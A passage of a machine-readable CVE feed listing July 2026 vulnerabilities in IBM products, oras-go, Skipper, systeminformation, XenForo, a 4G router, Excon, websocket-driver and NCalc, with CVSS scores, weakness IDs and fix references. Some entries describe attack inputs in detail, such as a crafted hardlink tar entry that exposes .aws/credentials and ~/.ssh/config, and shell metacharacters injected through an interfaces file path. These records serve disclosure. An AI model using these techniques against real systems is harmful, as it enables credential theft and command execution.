Container","cpes":["cpe:2.3:a:ibm:security_verify_access_container:10.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:security_verify_access_container:10.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:security_verify_access_container:10.0.9.1:*:*:*:*:*:*:*"],"versions":[{"version":"10.0","lessThanOrEqual":"10.0.9.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279510","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-4942","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:23.560","lastModified":"2026-07-17T20:17:23.560","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to send a specifically crafted message and downgrade the Transport Layer Security (TLS) protocol to a version disabled in the server configuration."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"i","cpes":["cpe:2.3:a:ibm:i:7.6:*:*:*:*:*:*:*","cpe:2.3:a:ibm:i:7.6.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:i:7.5:*:*:*:*:*:*:*","cpe:2.3:a:ibm:i:7.5.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:i:7.4:*:*:*:*:*:*:*","cpe:2.3:a:ibm:i:7.4.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:i:7.3:*:*:*:*:*:*:*","cpe:2.3:a:ibm:i:7.3.0:*:*:*:*:*:*:*"],"versions":[{"version":"7.6","status":"affected"},{"version":"7.5","status":"affected"},{"version":"7.4","status":"affected"},{"version":"7.3","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-757"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7278992","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-50151","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:23.683","lastModified":"2026-07-17T20:17:23.683","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"oras-go is a Go library for managing OCI artifacts. Prior to 2.6.1, registry/remote/repository.go in blobStore.completePushAfterInitialPost follows a registry-controlled Location header during monolithic blob upload and reuses the Authorization header from the initial POST request for the subsequent PUT request, allowing a malicious registry to return a cross-host Location and receive the caller's credentials at an attacker-controlled endpoint. This issue is fixed in version 2.6.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"oras-project","product":"oras-go","versions":[{"version":"< 2.6.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://github.com/oras-project/oras-go/commit/4683c46ef078091544f5f55fd25102f002806991","source":"security-advisories@github.com"},{"url":"https://github.com/oras-project/oras-go/pull/1152","source":"security-advisories@github.com"},{"url":"https://github.com/oras-project/oras-go/releases/tag/v2.6.1","source":"security-advisories@github.com"},{"url":"https://github.com/oras-project/oras-go/security/advisories/GHSA-jxpm-75mh-9fp7","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-50162","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:23.817","lastModified":"2026-07-17T20:17:23.817","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"oras-go is a Go library for managing OCI artifacts. Prior to 2.6.1, resolveWritePath() in content/file/file.go uses a lexical filepath.Rel check for workingDir and does not account for symlink traversal, so when AllowPathTraversalOnWrite=false an attacker-controlled blob title through ocispec.AnnotationTitle such as out/pwn.txt can follow a workingDir symlink out -> /some/outside/dir and cause pushFile() to create /some/outside/dir/pwn.txt outside workingDir. This issue is fixed in version 2.6.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"oras-project","product":"oras-go","versions":[{"version":"< 2.6.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-73"}]}],"references":[{"url":"https://github.com/oras-project/oras-go/commit/cc323e564d90c6b5b4bdd71d3c8d2ee2713b37e5","source":"security-advisories@github.com"},{"url":"https://github.com/oras-project/oras-go/releases/tag/v2.6.1","source":"security-advisories@github.com"},{"url":"https://github.com/oras-project/oras-go/security/advisories/GHSA-8xwf-rjm4-xvhv","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-50163","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:23.943","lastModified":"2026-07-17T20:17:23.943","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"oras-go is a Go library for managing OCI artifacts. Prior to 2.6.2, ensureLinkPath in content/file/utils.go:262-275 validates a hardlink target relative to the extract base but returns the unresolved target, causing os.Link(\"victim.secret\", \"<extract_base>/payload.tar.gz/evil_cwd_link\") to resolve header.Linkname against the process current working directory for a Typeflag=TypeLink entry such as Name=payload.tar.gz/evil_cwd_link and Linkname=\"victim.secret\" with io.deis.oras.content.unpack: \"true\", which can expose or tamper with files such as .env, .git/config, .aws/credentials, and ~/.ssh/config. This issue is fixed in version 2.6.2."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"oras-project","product":"oras-go","versions":[{"version":"< 2.6.2","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":4.2}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-22"},{"lang":"en","value":"CWE-59"}]}],"references":[{"url":"https://github.com/oras-project/oras-go/commit/c463c654ab3ef34422c1764cd619806cebf20451","source":"security-advisories@github.com"},{"url":"https://github.com/oras-project/oras-go/pull/1232","source":"security-advisories@github.com"},{"url":"https://github.com/oras-project/oras-go/releases/tag/v2.6.2","source":"security-advisories@github.com"},{"url":"https://github.com/oras-project/oras-go/security/advisories/GHSA-fxhp-mv3v-67qp","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-50197","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:24.087","lastModified":"2026-07-17T20:17:24.087","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Skipper is an HTTP router and reverse proxy for service composition. Prior to 0.26.10, zalando/skipper's OpenPolicyAgent integration silently bypasses request-body inspection on HTTP/1.1 Transfer-Encoding: chunked and HTTP/2 requests that omit the content-length pseudo-header, because the opaAuthorizeRequestWithBody filter and OpenPolicyAgentInstance.ExtractHttpBodyOptionally in filters/openpolicyagent/openpolicyagent.go produce an empty raw_body and input.parsed_body while the upstream service receives the full attacker-controlled body. This issue is fixed in version 0.26.10."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"zalando","product":"skipper","versions":[{"version":"< 0.26.10","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-444"}]}],"references":[{"url":"https://github.com/zalando/skipper/commit/3152f3b0bb52ca89c3564be42434db0a2a1cea23","source":"security-advisories@github.com"},{"url":"https://github.com/zalando/skipper/pull/4041","source":"security-advisories@github.com"},{"url":"https://github.com/zalando/skipper/releases/tag/v0.26.10","source":"security-advisories@github.com"},{"url":"https://github.com/zalando/skipper/security/advisories/GHSA-659f-rgp5-w4wf","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-50289","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:24.857","lastModified":"2026-07-17T20:17:24.857","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"systeminformation is a System and OS information library for node.js. Prior to 5.31.7, networkInterfaces() on Linux is vulnerable to OS command injection through the Debian/Ubuntu interfaces(5) source directive because lib/network.js checkLinuxDCHPInterfaces() reads /etc/network/interfaces, extracts a source <path> token from file content, and interpolates it unquoted into cat ${file} 2> /dev/null | grep 'iface\\|source' executed by execSync(cmd, util.execOptsLinux), allowing a path containing shell metacharacters to execute commands in any process that calls networkInterfaces(), including via getStaticData() and getAllData(). This issue is fixed in version 5.31.7."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"sebhildebrandt","product":"systeminformation","versions":[{"version":"< 5.31.7","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-78"}]}],"references":[{"url":"https://github.com/sebhildebrandt/systeminformation/commit/bbfddde48672d0ee124fefdb3cb4442fd9dd4f03","source":"security-advisories@github.com"},{"url":"https://github.com/sebhildebrandt/systeminformation/releases/tag/v5.31.7","source":"security-advisories@github.com"},{"url":"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-5xpp-75jx-m839","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-51833","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T20:17:24.990","lastModified":"2026-07-17T20:17:24.990","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Xenforo 2.3.8 is vulnerable to SSRF. Attackers that have administrator privileges or are able to add/save RSS feeds can enumerate internal services (ports) or expose the original IP address of the server."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{},"references":[{"url":"https://github.com/dennywise/CVE-2026-51833-Public-Disclosure/blob/main/CVE-2026-51833.md","source":"cve@mitre.org"},{"url":"https://xenforo.com","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-52199","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T20:17:25.100","lastModified":"2026-07-17T20:17:25.100","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"An issue in Generic OEM UZ801_v2.1 4G LTE Router V3.4.3 allows a remote attacker to execute arbitrary code via the sbin/adbd component"}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{},"references":[{"url":"https://github.com/lamaper/CVE-2026-52199","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-54171","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:26.500","lastModified":"2026-07-17T20:17:26.500","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Excon is usable, fast, simple HTTP 1.1 for Ruby. Prior to 1.5.0, Excon's RedirectFollower middleware failed to strip additional sensitive headers when following redirects and did not provide a custom list of headers to strip. This could cause inadvertent leakage of sensitive data when the initial request includes header information that is not intended for the new target. This issue is fixed in version 1.5.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"excon","product":"excon","versions":[{"version":"< 1.5.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-201"}]}],"references":[{"url":"https://github.com/excon/excon/commit/ea89a35308a12f4b791b6c50f2cbd33f94889fa3","source":"security-advisories@github.com"},{"url":"https://github.com/excon/excon/pull/901","source":"security-advisories@github.com"},{"url":"https://github.com/excon/excon/security/advisories/GHSA-48rx-c7pg-q66r","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54463","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:26.633","lastModified":"2026-07-17T20:17:26.633","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"websocket-driver is a WebSocket protocol handler with pluggable I/O. Prior to 0.8.1, draft versions of the WebSocket protocol in websocket-driver include a length header that allows an arbitrarily large integer to be encoded as bytes with the high bit set, and a server or client can send an indefinite sequence of 0x80 or higher bytes that the peer parses into an ever-growing Ruby integer. This can make a WebSocket connection consume an unbounded amount of memory and lead to the host process running out of memory. This issue is fixed in version 0.8.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"faye","product":"websocket-driver-ruby","versions":[{"version":"< 0.8.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"LOW","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/faye/websocket-driver-ruby/commit/d0141f041f6e3677a951255d547a313e732ccbe0","source":"security-advisories@github.com"},{"url":"https://github.com/faye/websocket-driver-ruby/security/advisories/GHSA-ghhp-3qvg-889p","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54464","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:26.770","lastModified":"2026-07-17T20:17:26.770","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"### Impact\n\nIf this library is used in tandem with the `permessage-deflate` extension, a\nWebSocket server or client can be made to accept messages that are larger than\nthe configured maximum message size. This is because this limit is checked\nagainst the message frames' length headers, which give the size of the\ncompressed data, not the size after decompression. This can lead to applications\naccepting larger messages than expected and exceeding their intended resource\nusage.\n\n### Patches\n\nThe issue has been patched in version 0.8.1, by checking the length of messages\nafter they are processed by incoming extensions. All users should upgrade to\nthis version.\n\n### Workarounds\n\nNo known workarounds exist.\n\n### Acknowledgements\n\nThis issue was discovered and reported by Pranjali Thakur, DepthFirst Security\nResearch Team."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"faye","product":"websocket-driver-ruby","versions":[{"version":"< 0.8.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"LOW","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/faye/websocket-driver-ruby/commit/fa8641724f10bf3273585f1dcf9041f540bbd036","source":"security-advisories@github.com"},{"url":"https://github.com/faye/websocket-driver-ruby/security/advisories/GHSA-33ph-fccm-39pj","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54465","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:26.897","lastModified":"2026-07-17T20:17:26.897","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"websocket-driver is a WebSocket protocol handler with pluggable I/O. Prior to 0.8.1, when websocket-driver is used to implement a WebSocket server on top of a TCP server using WebSocket::Driver.server() or to complement a WebSocket client, a peer can make a single connection consume an unbounded amount of memory by sending an HTTP request or response with a never-ending list of headers. This can lead to the receiving process running out of memory. This issue is fixed in version 0.8.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"faye","product":"websocket-driver-ruby","versions":[{"version":"< 0.8.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"LOW","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/faye/websocket-driver-ruby/commit/17b569f232896e71d458404ccf4854f80e987710","source":"security-advisories@github.com"},{"url":"https://github.com/faye/websocket-driver-ruby/security/advisories/GHSA-8j3g-f24p-4mpw","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-55254","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T20:17:27.023","lastModified":"2026-07-17T20:17:27.023","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"NCalc is a fast, lightweight expression evaluator for .NET. Prior to 6.1.1, the factorial operator implementation in src/NCalc.Core/Helpers/MathHelper.cs permits specially crafted expressions with extremely large factorial operands, causing excessive CPU consumption or a non-terminating loop due to integer overflow in the factorial calculation logic when applications evaluate untrusted expressions. This issue is fixed in version 6.1.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"ncalc","product":"ncalc","versions":[{"version":"< 6.1.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H","baseScore":4.8,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.2,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-190"},{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/ncalc/ncalc/commit/eeb6155ee1899b1fdf2cda3da35a4f0ca93ffd6a","source":"security-advisories@github.com"},{"url":"https://github.com/ncalc/ncalc/pull/575","source":"security-advisories@github.com"},{"url":"https://github.com/ncalc/ncalc/releases/tag/v6.1.1","source":"security-advisories@github.com"},{"url":"https://github.com/ncalc/ncalc/security/advisories/GHSA-3w5p-95mh-gq75","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-7364","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:29.203","last